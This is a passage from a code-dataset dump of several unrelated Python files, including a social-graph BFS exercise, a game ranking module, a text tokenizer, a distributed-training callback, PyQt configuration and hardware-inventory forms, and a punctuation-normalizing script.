graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n\n # Add users\n for i in range(num_users):\n self.add_user(f\"User_{i+1}\")\n # Linear time \n # Refactor to be O(n) time \n total_friendships = avg_friendships * num_users // 2\n friendshipsCreated = 0\n collisions = 0\n # Pick a random number 1-n, pick another random number 1-n\n while friendshipsCreated < total_friendships:\n user_id = random.randint(1, self.last_id)\n friend_id= random.randint(1, self.last_id)\n # Create friendship between those 2 ids\n if self.add_friendship(user_id, friend_id):\n friendshipsCreated += 1\n else:\n collisions += 1\n # Until you have friendship count = totalFriendships\n print(f\"COLLISIONS: {collisions}\")\n\n\n # Adding a friendship creates two edges\n # Create friendships\n # Create a list with all possible friendships\n # possible_friendships = []\n # for user_id in self.users:\n # for friends_id in range(user_id+1, self.last_id + 1):\n # possible_friendships.append((user_id, friends_id))\n \n # # Shuffle the list\n # random.shuffle(possible_friendships)\n # # print(\"-------\")\n # # print(possible_friendships)\n # # print(\"----\")\n # # Grad the first total_friendship pairs from the list and create friendships\n # for i in range(num_users * avg_friendships // 2):\n # friendship = possible_friendships[i]\n # # print(f\"This is a friendship - {friendship}\")\n # self.add_friendship(friendship[0], friendship[1])\n\n # average_friends = total_friendships / num_users\n # total_friendships = avg_friendships = num users \n # N = avg_friendships + num_users // 2\n\n def populate_graph_quadratic(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n\n # Add users\n for i in range(num_users):\n self.add_user(f\"User_{i+1}\")\n\n # Adding a friendship creates two edges\n # Create friendships\n # Create a list with all possible friendships\n possible_friendships = []\n for user_id in self.users:\n for friends_id in range(user_id+1, self.last_id + 1):\n possible_friendships.append((user_id, friends_id))\n \n # # Shuffle the list\n random.shuffle(possible_friendships)\n # # print(\"-------\")\n # # print(possible_friendships)\n # # print(\"----\")\n # # Grad the first total_friendship pairs from the list and create friendships\n for i in range(num_users * avg_friendships // 2):\n friendship = possible_friendships[i]\n # print(f\"This is a friendship - {friendship}\")\n self.add_friendship(friendship[0], friendship[1])\n\n # average_friends = total_friendships / num_users\n # total_friendships = avg_friendships = num users \n # N = avg_friendships + num_users // 2\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n q = Queue()\n #Return extended network of users \n visited = {} # Note that this is a dictionary, not a set\n # Dictionary will have a key and value pair \n # !!!! IMPLEMENT ME\n q.enqueue([user_id])\n # For every user_id we need to traverse and find connecting nodes\n # for each node find the shortest path \n # counter = 0\n while q.size() > 0:\n # counter += 1\n # print(\"Degree\",counter)\n path = q.dequeue()\n # print(path)\n v = path[-1]\n if v not in visited:\n # print(v)\n visited[v] = path\n for friend_id in self.friendships[v]:\n path_copy = path.copy()\n path_copy.append(friend_id)\n q.enqueue(path_copy)\n \n \n # set the shortest path as the value in key value \n # Track visited \n # If not visited ...\n #run our bft for shortest path \n\n return visited\n\n\nif __name__ == '__main__':\n sg = SocialGraph()\n start_time = time.time()\n num_users = 100\n avg_friendships = 5\n start_time = time.time()\n # Only good if you have sparse graphs not good for dense \n sg.populate_graph_linear(num_users, avg_friendships)\n end_time = time.time()\n print(f\"Linear runtime: {end_time - start_time} seconds\")\n start_time = time.time()\n sg.populate_graph_quadratic(num_users, avg_friendships)\n end_time = time.time()\n print(f\"Quadratic runtime: {end_time - start_time} seconds\")\n # print(f\"Users - {sg.users}\")\n # print(f\"Friendships - {sg.friendships}\")\n # print(sg.get_all_social_paths(1))\n # connections = sg.get_all_social_paths(1)\n # print(connections)\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"538525066","text":"#-*-coding:utf-8-*-\r\nimport rank.object\r\nfrom props.defines import *\r\n\r\n\r\ngdSubNoMapEquipPos = {\r\n\t401:EQUIP_WEAPON,\t#武器\r\n\t402:EQUIP_CLOTHES,\t#衣服\t\r\n\t403:EQUIP_HEAD,\t\t#帽子\r\n\t404:EQUIP_NECKLACE,\t#饰品\r\n\t405:EQUIP_BELT,\t\t#腰带\r\n\t406:EQUIP_SHOES,\t#鞋子\r\n}\r\nclass cRanking(rank.object.cRanking):\r\n\t'''角色装备排行榜\r\n\t'''\r\n\tdef title3(self, iUid):#override\r\n\t\t'''装备名称\r\n\t\t'''\r\n\t\tidx = self.getRoleArgs(iUid).get(\"idx\", 0)\r\n\t\treturn equipData.getConfig(idx, \"名称\", \"\")\r\n\r\n\tdef addRank(self, who):#override\r\n\t\tiWearPos = gdSubNoMapEquipPos.get(self.iRankNo, 0)\r\n\t\toWearEquip = who.equipCtn.getEquipByWearPos(iWearPos)\r\n\t\tif not oWearEquip:\r\n\t\t\treturn\r\n\t\tself.updateScore(who.id, who.name, oWearEquip.getScore(), who.level, who.school, idx=oWearEquip.idx, id=oWearEquip.id)\r\n\r\n\tdef lookInfo(self, who, other, iUid):#override\r\n\t\tiPropsId = self.getRoleArgs(iUid).get(\"id\", 0)\r\n\t\toWearEquip = other.propsCtn.getItem(iPropsId)\r\n\t\tif not oWearEquip:\r\n\t\t\toWearEquip = other.equipCtn.getItem(iPropsId)\r\n\t\tif not oWearEquip:\r\n\t\t\tmessage.tips(who,\"该装备已经失效\")\r\n\t\t\treturn\r\n\t\twho.endPoint.rpcPropsHyperlink(oWearEquip.getMsg4Item(None,*oWearEquip.MSG_ALL))\t\r\n\r\n\tdef getMyRankInfo(self, who):#override\r\n\t\t'''我的名次信息\r\n\t\t'''\r\n\t\tiWearPos = gdSubNoMapEquipPos.get(self.iRankNo, 0)\r\n\t\toWearEquip = who.equipCtn.getEquipByWearPos(iWearPos)\r\n\t\tif not oWearEquip:\r\n\t\t\treturn []\r\n\r\n\t\ttMyInfo = []\r\n\t\ttMyInfo.append(self.getRank(who.id))\r\n\t\ttMyInfo.append(who.name)\r\n\t\ttMyInfo.append(oWearEquip.name)\r\n\t\ttMyInfo.append(oWearEquip.getScore())\r\n\t\treturn tMyInfo\r\n\r\n\r\n\r\nimport equipData\r\nimport rank_pb2\r\nimport props.equip\r\nimport message\r\n\r\n\r\n","sub_path":"logic/rank/equipScore.py","file_name":"equipScore.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"516882485","text":"# Structurally Constrained Recurrent Network (SCRN) Model\n#\n# This gives an implementation of the SCRN model given in Mikolov et al. 2015, arXiv:1412.7753 [cs.NE], \n# https://arxiv.org/abs/1412.7753 using Python and Tensorflow.\n#\n# This model is superceded by the Delta-RNN model given in Ororbia et al. 2017, arXiv:1703.08864 [cs.CL], \n# https://arxiv.org/abs/1703.08864 implemented in this repository using Python and Tensorflow.\n#\n# Functions to translate between text elements (raw data) and tokens (data fed into the models) for the LSTM, SCRN, \n# and SRN models.\n#\n# Stuart Hagler, 2017\n\n# usecase_flg = 1 for predicting letters\n# 2 for predicting words with cutoff for infrequent words\n\n# Imports\nimport collections\nimport string\n\n# Generate dictionary of tokens for text elements and convert text to tokens\ndef text_elements_to_tokens(usecase_flg, text_elements, word_frequency_cutoff):\n dictionary = dict()\n if usecase_flg == 1:\n vocabulary_size = len(string.ascii_lowercase) + 2\n letters = ['UNK']\n letters += [' ']\n for letter in string.ascii_lowercase:\n letters += [letter]\n for letter in letters:\n dictionary[letter] = len(dictionary)\n vocab_size = vocabulary_size\n elif usecase_flg == 2:\n words = [['UNK', -1]]\n words.extend(collections.Counter(text_elements).most_common(len(text_elements)))\n frequencies = [i[1] for i in words]\n cutoff = word_frequency_cutoff\n while cutoff > 0:\n if cutoff in frequencies:\n idx = frequencies.index(cutoff)\n words = words[:idx]\n cutoff = 0\n else:\n cutoff -= 1\n for word, _ in words:\n dictionary[word] = len(dictionary)\n vocab_size = len(words)\n data = list()\n for text_element in text_elements:\n if text_element in dictionary:\n index = dictionary[text_element]\n else:\n index = dictionary['UNK']\n data.append(index)\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys())) \n return data, dictionary, reverse_dictionary, vocab_size\n\n# Find text element for probability distribution over tokens\ndef token_to_text_element(probabilities, reverse_dictionary):\n return [reverse_dictionary[token] for token in np.argmax(probabilities, 1)]","sub_path":"MikolovJoulinChopraEtAl2015/python/tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"383251035","text":"# -*- coding:utf-8 -*-\n\n# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the MIT License.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# MIT License for more details.\n\n\"\"\"Data parallel callback.\"\"\"\n\nimport logging\nimport vega\nfrom .callback import Callback\nfrom vega.common import ClassFactory, ClassType\nfrom vega.common.general import General\n\nlogger = logging.getLogger(__name__)\n\n\n@ClassFactory.register(ClassType.CALLBACK)\nclass Hccl(Callback):\n \"\"\"Callback that saves the evaluated Performance.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize ModelCheckpoint callback.\"\"\"\n super(Hccl, self).__init__()\n self.priority = 260\n\n def init_trainer(self, logs=None):\n \"\"\"Set trainer object for current callback.\"\"\"\n if not self.trainer.hccl:\n return\n\n if vega.is_torch_backend():\n self._init_pytorch_trainer()\n if vega.is_ms_backend():\n self._init_ms_trainer()\n\n def _init_pytorch_trainer(self):\n import torch\n import torch.distributed as dist\n logger.info(\"init HCCL\")\n model = self.trainer.model\n dist.init_process_group(\n backend='hccl',\n init_method=f\"tcp://{General.cluster.hccl_server_ip}:{General.cluster.hccl_port}\",\n world_size=self.trainer.num_workers,\n rank=self.trainer.rank_id)\n model = torch.nn.parallel.DistributedDataParallel(\n model,\n device_ids=[self.trainer.device_id],\n broadcast_buffers=General.cluster.enable_broadcast_buffers)\n self.trainer.model = model\n\n def _init_ms_trainer(self):\n from mindspore import context\n from mindspore.context import ParallelMode\n from mindspore.communication.management import init\n\n logger.info(\"init HCCL\")\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True)\n init()\n\n def before_epoch(self, epoch, logs=None):\n \"\"\"Be called before each epoach.\"\"\"\n if not vega.is_torch_backend() or not self.trainer.hccl:\n return\n if self.trainer.sampler is not None:\n self.trainer.sampler.set_epoch(epoch)\n\n def after_train(self, logs=None):\n \"\"\"Stop session.\"\"\"\n if self.trainer.hccl and vega.is_tf_backend():\n self.trainer.sess.run(self.trainer.npu_shutdown)\n self.trainer.sess.close()\n","sub_path":"vega/trainer/callbacks/hccl.py","file_name":"hccl.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"603260169","text":"\nimport sys\nfrom PyQt4 import QtGui\nimport io\nimport ConfigParser\nfrom PyQt4.QtGui import *\n \n\n#adding mask to tacking.cfg causes type errors \n#----------------------------------------------------------------------\n\n# Create an PyQT4 application object.\na = QApplication(sys.argv) \n\n# The QWidget widget is the base class of all user interface objects in PyQt4.\nw = QWidget()\n\n# Get filename using QFileDialog\npath = QFileDialog.getOpenFileName(w, 'Open File', '/') \npath1= str(path)\n\nclass gui(QtGui.QWidget):\n\n \n def __init__(self):\n super(gui, self).__init__()\n \n self.initUI()\n \n\n def initUI(self): \n\n self.btn = QtGui.QPushButton('Set Config', self)\n # self.btn.move(20, 20)\n self.btn.clicked.connect(self.createConfig)\n \n self.label1 = QtGui.QLabel(\"first frame to process\")\n # input box \n self.input1 = QtGui.QLineEdit()\n\n self.label2 = QtGui.QLabel(\"number of frames to process\")\n # self.label1.move(130, 22)\n self.input2 = QtGui.QLineEdit()\n # self.le.move(150, 22)\n\n self.label3 = QtGui.QLabel(\"maximum connection-distance\")\n self.input3 = QtGui.QLineEdit()\n\n self.label4 = QtGui.QLabel(\"maximum segmentation-distance\")\n self.input4 = QtGui.QLineEdit()\n\n\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n\n grid.addWidget(self.label1, 1, 0)\n grid.addWidget(self.input1, 1, 1)\n\n grid.addWidget(self.label2, 2, 0)\n grid.addWidget(self.input2, 2, 1)\n\n grid.addWidget(self.label3, 3, 0)\n grid.addWidget(self.input3, 3, 1)\n\n grid.addWidget(self.label4, 4, 0)\n grid.addWidget(self.input4, 4, 1)\n\n grid.addWidget(self.btn, 5, 0)\n\n self.setLayout(grid) \n \n # window box location and size \n self.setGeometry(500, 100, 550, 150)\n\n self.setWindowTitle('Input config')\n self.show()\n \n \n\n def createConfig(self,path):\n \"\"\"\n Create a config file\n \"\"\"\n config = ConfigParser.ConfigParser()\n\n# add new content to config file \n config.add_section(\"added\")\n config.set(\"added\", \"frame1\", self.input1.text())\n config.set(\"added\", \"nframes\", self.input2.text())\n config.set(\"added\", \"mm-connection-distance\", self.input3.text())\n config.set(\"added\", \"mm-segmentation-distance\", self.input4.text())\n # config.remove_section(\"added\")\n\n # opens a file for writing \n # with open(path,\"wb\") as config_file:\n\n # opens a file for appending \n with open(path1,\"a\") as config_file:\n config.write(config_file)\n\n# to remove the section header from config file \n\n #opens the file to read \n f = open(path1,\"r\")\n lines = f.readlines()\n f.close()\n #opens the file to write \n f = open(path1,\"w\")\n for line in lines:\n #removes the section header \n if line!=\"[added]\"+\"\\n\":\n f.write(line)\n f.close()\n\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n ex = gui()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n\n \n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"451755341","text":"import torch\nfrom torch.utils.data import Dataset\nimport albumentations as A\nfrom albumentations.pytorch.transforms import ToTensorV2\nfrom .data_reader import read_image, read_mask\n\n\ndef get_train_transform():\n return A.Compose(\n [\n A.Resize(256, 256),\n A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n A.HorizontalFlip(p=0.25),\n A.VerticalFlip(p=0.25),\n ToTensorV2()\n ])\n\n\n# Dataset Loader\nclass LoadDataSet(Dataset):\n def __init__(self, df, transform=None):\n self.df = df\n self.transforms = transform\n\n def __len__(self):\n return self.df.shape[0]\n\n def __getitem__(self, idx):\n mask_folder = self.df.iloc[idx][\"mask_dir\"]\n image_path = self.df.iloc[idx][\"image_path\"]\n\n img = read_image(image_path)\n mask = read_mask(mask_folder)\n\n augmented = self.transforms(image=img, mask=mask)\n img = augmented['image']\n mask = augmented['mask']\n mask = mask.permute(2, 0, 1)\n mask = torch.div(mask, 255)\n return img, mask\n","sub_path":"Loading/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"132276133","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport datetime\n\nfrom PyQt5.QtWidgets import QDialog, QLabel, QVBoxLayout, QLineEdit, QPushButton, QToolButton, QDateEdit, QTextEdit, QMessageBox, QSpinBox,QComboBox\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QIcon, QFont\nfrom dateutil.relativedelta import relativedelta\nimport data_sets\nimport hw_status\nimport liblogos\nimport models\nimport stdio\nimport libpg\nimport qlib as qc\nimport unit_transfer\n\n\nclass HardwareEdit(QDialog):\n def __init__(self, hardwar_dict, parent=None):\n super(HardwareEdit, self).__init__(parent)\n # self.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint | Qt.WindowStaysOnTopHint)\n self.setWindowTitle('Ficha de Equipamento')\n masterLayout = QVBoxLayout(self)\n # vars\n self.hardware_dict = hardwar_dict\n font = QFont('courier new', 10)\n font.setWeight(80)\n font.setBold(False)\n self.hw_id = QLabel()\n self.hw_id.setMaximumWidth(80)\n self.hw_unit_id = QLabel()\n masterLayout.addLayout(qc.addHLayout([self.hw_id, self.hw_unit_id, True]))\n self.md_name = QLabel()\n self.md_name.setStyleSheet(\"background-color: #dbf3ff;\")\n masterLayout.addLayout(qc.addHLayout(['Modelo:', self.md_name], lw=80))\n self.hw_type_name = QLabel()\n self.hw_type_name.setStyleSheet(\"background-color: #dbf3ff; \")\n masterLayout.addLayout(qc.addHLayout(['Tipo', self.hw_type_name], lw=80))\n self.hw_sn = QLineEdit()\n self.hw_sn.setFont(font)\n self.hw_sn.setMaxLength(40)\n self.hw_sn.setReadOnly(True)\n self.hw_sn.setStyleSheet(\"background-color: #dbf3ff;\")\n self.hw_sn.textEdited.connect(self.serial_edited)\n \n masterLayout.addLayout(qc.addHLayout(['N/S:', self.hw_sn], lw=80))\n self.hw_status = QLabel()\n self.hw_status.setStyleSheet(\"background-color: #dbf3ff;\")\n hw_status_change = QToolButton()\n hw_status_change.setIcon(QIcon('.//img//edit.png'))\n hw_status_change.clicked.connect(self.hw_status_click)\n masterLayout.addLayout(qc.addHLayout(['Estado:', self.hw_status, hw_status_change, True], lw=80))\n masterLayout.addWidget(qc.HLine())\n self.unitNameLb = QLabel()\n self.unitNameLb.setMaximumWidth(200)\n unitChangeTBt = QToolButton()\n unitChangeTBt.setIcon(QIcon('.//img//change_unit.png'))\n masterLayout.addLayout(qc.addHLayout(['Unidade:', self.unitNameLb, True, unitChangeTBt], lw=80))\n self.hw_function = QLineEdit()\n self.hw_function.setMaxLength(20)\n self.hw_function.setMaximumWidth(200)\n masterLayout.addLayout(qc.addHLayout(['Função:', self.hw_function, True], lw=80))\n masterLayout.addWidget(qc.HLine())\n self.hw_invoice_date = QDateEdit()\n self.hw_invoice_date.setMaximumWidth(100)\n self.hw_invoice_date.setDisplayFormat(\"dd.MM.yyyy\")\n self.hw_invoice = QLineEdit()\n self.hw_invoice.setMaxLength(10)\n self.hw_invoice.setMaximumWidth(100)\n self.hw_warranty = QSpinBox()\n self.hw_warranty.setMaximumWidth(70)\n self.hwSellAgeLabel = QLabel()\n self.hwSellAgeLabel.setStyleSheet(\"color: #FF10ff;\")\n masterLayout.addLayout(qc.addHLayout(['Doc. Venda:', self.hw_invoice, 'Data:', self.hw_invoice_date, 'Garantia:', self.hw_warranty, True], lw=80))\n masterLayout.addLayout(qc.addHLayout(['I. Venda:', self.hwSellAgeLabel]))\n masterLayout.addWidget(qc.HLine())\n self.hw_supplier = QLineEdit()\n self.hw_supplier.setMaxLength(40)\n self.hw_supplier.setMaximumWidth(200)\n masterLayout.addLayout(qc.addHLayout(['Fornecedor:', self.hw_supplier, True], lw=80))\n self.hw_supplier_date = QDateEdit()\n self.hw_supplier_date.setMaximumWidth(100)\n self.hw_supplier_date.setDisplayFormat(\"dd.MM.yyyy\")\n self.hw_invoice_supplier = QLineEdit()\n self.hw_invoice_supplier.setMaxLength(10)\n self.hw_invoice_supplier.setMaximumWidth(100)\n self.hw_supplier_warranty = QSpinBox()\n self.hw_supplier_warranty.setMaximumWidth(70)\n masterLayout.addLayout(qc.addHLayout(['Factura:', self.hw_invoice_supplier, 'Data:', self.hw_supplier_date, 'Garantia',\n self.hw_supplier_warranty, True], lw=80))\n\n self.hwBuyAgeLabel = QLabel()\n self.hwBuyAgeLabel.setStyleSheet(\"color: #FF10ff;\")\n masterLayout.addLayout(qc.addHLayout(['I. Compra:', self.hwBuyAgeLabel]))\n self.hw_obs = QTextEdit()\n self.hw_obs.setMaximumHeight(200)\n masterLayout.addWidget(self.hw_obs)\n saveBtn = QPushButton('Guardar')\n saveBtn.clicked.connect(self.save_click)\n exitBtn = QPushButton('Sair')\n exitBtn.clicked.connect(self.exit_click)\n masterLayout.addLayout(qc.addHLayout([saveBtn, exitBtn]))\n if self.hardware_dict['hw_id'] == -1:\n form = models.ModelsBrowser({'mode': 1})\n form.exec_()\n if 'brand_name' in form.ret:\n self.hardware_dict['md_name'] = form.ret['brand_name'] + ' ' + form.ret['model_name']\n self.hardware_dict['model_id'] = form.ret['model_id']\n self.hardware_dict['hw_type_name'] = form.ret['hw_type_name']\n self.hw_sn.setReadOnly(False)\n self.hw_sn.setStyleSheet(\"background-color: #00ff00;\")\n self.init_form()\n self.refresh_form()\n else:\n saveBtn.setEnabled(False)\n else:\n self.hardware_dict = data_sets.hardware_to_dict(self.hardware_dict['hw_id'])\n unitChangeTBt.clicked.connect(self.hw_change_unit)\n self.refresh_form()\n \n def hw_status_click(self):\n form = hw_status.HardwareStatus()\n form.exec_()\n if form.ret[0]:\n self.hw_status.setText(form.ret[1])\n if form.ret[2] == 0:\n self.hardware_dict['hw_unit_id'] = 0 # em stock\n if form.ret[2] == 3:\n self.hardware_dict['hw_unit_id'] = 99999 # emprestimo\n \n def hw_change_unit(self):\n form = unit_transfer.HardwareTransfer(self.hardware_dict)\n form.exec_()\n if form.ret:\n self.close()\n \n def init_form(self):\n self.hardware_dict['hw_id'] = -1\n self.hardware_dict['hw_sn'] = ''\n self.hardware_dict['hw_status_name'] = 'Activo'\n self.hardware_dict['hw_status_id'] = 2\n self.hardware_dict['hw_function'] = ''\n self.hardware_dict['hw_invoice'] = 'n/a'\n self.hardware_dict['hw_invoice_date'] = datetime.datetime(2012, 0o1, 0o1)\n self.hardware_dict['hw_warranty'] = 0\n self.hardware_dict['hw_supplier'] = 'n/a'\n self.hardware_dict['hw_supplier_warranty'] = 0\n if 'un_name' in self.hardware_dict:\n pass\n else:\n self.hardware_dict['un_name'] = ''\n self.hardware_dict['hw_supplier_date'] = datetime.datetime(2012, 0o1, 0o1) # datetime.datetime.now()\n self.hardware_dict['hw_invoice_supplier'] = 'n/a'\n self.hardware_dict['hw_obs'] = ''\n \n def refresh_form(self):\n self.hw_id.setText(str(self.hardware_dict['hw_id']) + '-' + '{0:x}'.format(self.hardware_dict['hw_id']).upper())\n self.md_name.setText(self.hardware_dict['md_name'])\n self.hw_type_name.setText(self.hardware_dict['hw_type_name'])\n self.hw_sn.setText(self.hardware_dict['hw_sn'])\n self.hw_status.setText(self.hardware_dict['hw_status_name'])\n self.hw_function.setText(self.hardware_dict['hw_function'])\n self.hw_invoice.setText(self.hardware_dict['hw_invoice'])\n try:\n self.hw_invoice_date.setDate(self.hardware_dict['hw_invoice_date'])\n except TypeError:\n self.hw_invoice_date.setDate(datetime.datetime.now() - relativedelta(years=10))\n self.hw_warranty.setValue(self.hardware_dict['hw_warranty'])\n self.hw_supplier.setText(self.hardware_dict['hw_supplier'])\n try:\n self.hw_supplier_date.setDate(self.hardware_dict['hw_supplier_date'])\n except TypeError:\n self.hw_supplier_date.setDate(datetime.datetime.now() - relativedelta(years=10))\n self.hw_invoice_supplier.setText(self.hardware_dict['hw_invoice_supplier'])\n self.unitNameLb.setText(self.hardware_dict['un_name'])\n self.hw_supplier_warranty.setValue(self.hardware_dict['hw_supplier_warranty'])\n self.hw_obs.setText(self.hardware_dict['hw_obs'])\n self.hwSellAgeLabel.setText(td_format(datetime.datetime.today().date() - self.hw_invoice_date.date().toPyDate()))\n self.hwBuyAgeLabel.setText(td_format(datetime.datetime.today().date() - self.hw_supplier_date.date().toPyDate()))\n \n def insert_record(self):\n a = ()\n sql = '''insert into hardware(\n hw_model_id, hw_sn, hw_unit_id, hw_function, hw_invoice, hw_invoice_date, hw_supplier,\n hw_warranty, hw_supplier_date, hw_invoice_supplier, hw_supplier_warranty, hw_obs, hw_status_id)\n VALUES (%s,%s,%s, %s,%s,%s, %s,%s,%s, %s,%s,%s, 1) '''\n data = (self.hardware_dict['model_id'],)\n data += (str(stdio.write_field(self.hw_sn)).upper(),)\n data += (self.hardware_dict['hw_unit_id'],)\n data += (stdio.write_field(self.hw_function),)\n data += (stdio.write_field(self.hw_invoice),)\n data += (stdio.write_field(self.hw_invoice_date),)\n data += (stdio.write_field(self.hw_supplier),)\n data += (stdio.write_field(self.hw_warranty),)\n data += (stdio.write_field(self.hw_supplier_date),)\n data += (stdio.write_field(self.hw_invoice_supplier),)\n data += (stdio.write_field(self.hw_supplier_warranty),)\n data += (stdio.write_field(self.hw_obs),)\n libpg.execute_query(sql, data)\n liblogos.hardware_update_settings(self.hardware_dict['hw_unit_id'])\n self.close()\n \n def update_record(self):\n sql = '''UPDATE hardware set\n hw_unit_id=%s,\n hw_function=%s,\n hw_invoice=%s,\n hw_invoice_date=%s,\n hw_warranty=%s,\n hw_supplier=%s,\n hw_supplier_date=%s,\n hw_model_id=%s,\n hw_invoice_supplier=%s,\n hw_supplier_warranty=%s,\n hw_obs=%s,\n hw_status_id=(select hwd_status_id from hw_status where lower(hwd_status_name) = %s)\n WHERE hw_id= %s'''\n data = (self.hardware_dict['hw_unit_id'],)\n data += (stdio.write_field(self.hw_function),)\n data += (stdio.write_field(self.hw_invoice),)\n data += (stdio.write_field(self.hw_invoice_date),)\n data += (stdio.write_field(self.hw_warranty),)\n data += (stdio.write_field(self.hw_supplier),)\n data += (stdio.write_field(self.hw_supplier_date), self.hardware_dict['hw_model_id'])\n data += (stdio.write_field(self.hw_invoice_supplier),)\n data += (stdio.write_field(self.hw_supplier_warranty),)\n data += (stdio.write_field(self.hw_obs),)\n data += (self.hw_status.text().lower(),)\n data += (self.hardware_dict['hw_id'],)\n libpg.execute_query(sql, data)\n liblogos.hardware_update_settings(self.hardware_dict['hw_unit_id'])\n \n def exit_click(self):\n self.close()\n \n def save_click(self):\n if self.hardware_dict['hw_id'] == -1:\n a = libpg.query_one('select hw_id from hardware where hw_sn = %s', (self.hw_sn.text().upper(),))\n if a is None:\n self.insert_record()\n else:\n QMessageBox.critical(None,\"Pesquisa de Numero de Série\",\"O numero de série já existe na Base de Dados\",\n QMessageBox.StandardButtons(QMessageBox.Close), QMessageBox.Close)\n else:\n self.update_record()\n self.close()\n\n def serial_edited(self):\n a = self.hw_sn.text().upper()\n a = a.replace('-','')\n a = a.replace('.','')\n a = a.replace('(','')\n a = a.replace(')','')\n a = a.replace('/','')\n a = a.replace(',','')\n a = a.replace('#','')\n a = a.replace(' ','')\n a = a.replace('_','')\n a = a.replace('[','')\n a = a.replace(']','')\n self.hw_sn.setText(a)\n\n\ndef td_format(td_object):\n seconds = int(td_object.total_seconds())\n periods = [\n ('ano', 60*60*24*365),\n ('mese', 60*60*24*30),\n ('dia', 60*60*24),\n ('hour', 60*60),\n ('minute', 60),\n ('second', 1)\n ]\n strings = []\n for period_name, period_seconds in periods:\n if seconds > period_seconds:\n period_value , seconds = divmod(seconds, period_seconds)\n has_s = 's' if period_value > 1 else ''\n strings.append(\"%s %s%s\" % (period_value, period_name, has_s))\n return \", \".join(strings)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"hardware_edit.py","file_name":"hardware_edit.py","file_ext":"py","file_size_in_byte":13015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"295398902","text":"# -*- coding: utf-8 -*-\n\nif __name__ == '__main__':\n import re\n import os\n import json\n import docx\n\n # 要预处理的文件夹路径\n base_path = \"english_pro_module/raw_data/\"\n base_path_processed = \"english_pro_module/raw_data_processed/\"\n # 要替换的中英文符号\n rep = {',': ',', '。': '.', '?': '?', '!': '!', ';': ';', ':': ':', '(': '(', ')': ')',\n '“': '\"', '”': '\"'}\n\n # 格式化字符串\n def format_str(rep, str):\n rep = dict((re.escape(k), v) for k, v in rep.items())\n pattern = re.compile(\"|\".join(rep.keys()))\n str_format = pattern.sub(lambda m: rep[re.escape(m.group(0))], str)\n\n return str_format\n\n # 处理txt文件\n def process_txt(file):\n file_list = []\n if not os.path.isdir(file):\n f = open(base_path + \"/\" + file)\n iter_f = iter(f)\n for line in iter_f:\n str_format = format_str(rep, line)\n file_list.append(str_format)\n\n file_object = open(base_path + \"/\" + file, 'w')\n for line in file_list:\n file_object.write(line)\n file_object.write('\\n')\n file_object.close()\n\n # 处理docx文件\n def process_docx(file):\n word = docx.Document(base_path + file)\n word_processed = docx.Document()\n for para in word.paragraphs:\n str_format = format_str(rep, para.text)\n word_processed.add_paragraph(str_format)\n word_processed.save(base_path + file.split('.')[0] + '_processed.docx')\n\n # 处理json文件\n def process_json(file):\n with open(base_path + file) as f:\n pop_data = json.load(f)\n for pop_dict in pop_data:\n for i in range(len(pop_dict['groupQuestions'])):\n format_article = format_str(rep, pop_dict['groupQuestions'][i]['article'])\n pop_dict['groupQuestions'][i]['article'] = format_article\n for j in range(len(pop_dict['groupQuestions'][i]['questions'])):\n title = format_str(rep, pop_dict['groupQuestions'][i]['questions'][j]['title'])\n pop_dict['groupQuestions'][i]['questions'][j]['title'] = title\n for m in range(len(pop_dict['groupQuestions'][i]['questions'][j]['answers'])):\n answer = format_str(rep, pop_dict['groupQuestions'][i]['questions'][j]['answers'][m])\n pop_dict['groupQuestions'][i]['questions'][j]['answers'][m] = answer\n\n print(pop_data)\n with open(base_path + file, 'w') as f:\n json.dump(pop_data, f)\n\n # 预处理数据\n def preprocessData():\n process_docx('correction.docx')\n process_txt('phrase.txt')\n process_txt('words.txt')\n process_json('listening.json')\n\n preprocessData()","sub_path":"Server/ExermonServer/preprocessData.py","file_name":"preprocessData.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 